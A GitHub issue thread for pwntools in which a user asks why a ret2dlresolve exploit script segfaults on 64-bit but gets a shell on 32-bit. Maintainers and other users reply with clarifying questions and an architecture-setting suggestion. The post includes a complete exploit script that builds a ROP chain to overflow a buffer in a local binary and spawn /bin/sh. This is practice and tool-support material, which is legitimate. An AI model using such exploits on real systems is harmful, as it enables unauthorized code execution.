
ret2dlresolve segfaulting.

Open rectanglestuff opened this issue 1 year ago • 2 comments

I get a segfault for 64 bit; 64+context.bytes is 72, and this seems to be the correct offset for the 64-bit example.

On 32 bit, p.send(fit({76: rop.chain(), 200: dlresolve.payload})) still gets a shell.

from pwn import *

# context.binary sets context.arch / context.bits from the ELF header
context.binary = elf = ELF('./main')
rop = ROP(elf)
# fake Sym/Rel/strtab blob that makes ld.so resolve "system" and call it with "/bin/sh"
dlresolve = Ret2dlresolvePayload(elf, symbol="system", args=["/bin/sh"])

# stage 1: read the dlresolve blob into a writable address, then trigger the resolver
rop.read(0, dlresolve.data_addr)
rop.ret2dlresolve(dlresolve)

raw_rop = rop.chain()
print(rop.dump())
print(64+context.bytes)   # expected 72 on amd64, 68 on i386

p = elf.process()
# offset 64+context.bytes = 64-byte buffer plus saved frame pointer; the blob is at offset 200
p.sendline(fit({64+context.bytes: raw_rop, 200: dlresolve.payload}))
p.interactive()

rectanglestuff avatar Jun 08 '24 08:06 rectanglestuff

Thank you for contributing to pwntools. In order for us to be able to help you, we need more information.

  1. What have you done?
  2. What did you expect?
  3. What happened instead?
  4. What version of pwntools are you using (pwn version), what scripts and binaries have you used, can we reproduce it too?

Arusekk avatar Jun 15 '24 14:06 Arusekk

Try adding context.arch = 'amd64' at line 3? Pwntools has 32-bit and 64-bit payloads, and 32-bit is the default option.

RocketMaDev avatar Jun 27 '24 17:06 RocketMaDev

Were you able to resolve this?

trishaa4144 avatar Dec 06 '24 17:12 trishaa4144

Need more information. Feel free to reopen once you can tell us more.

Arusekk avatar Mar 01 '25 01:03 Arusekk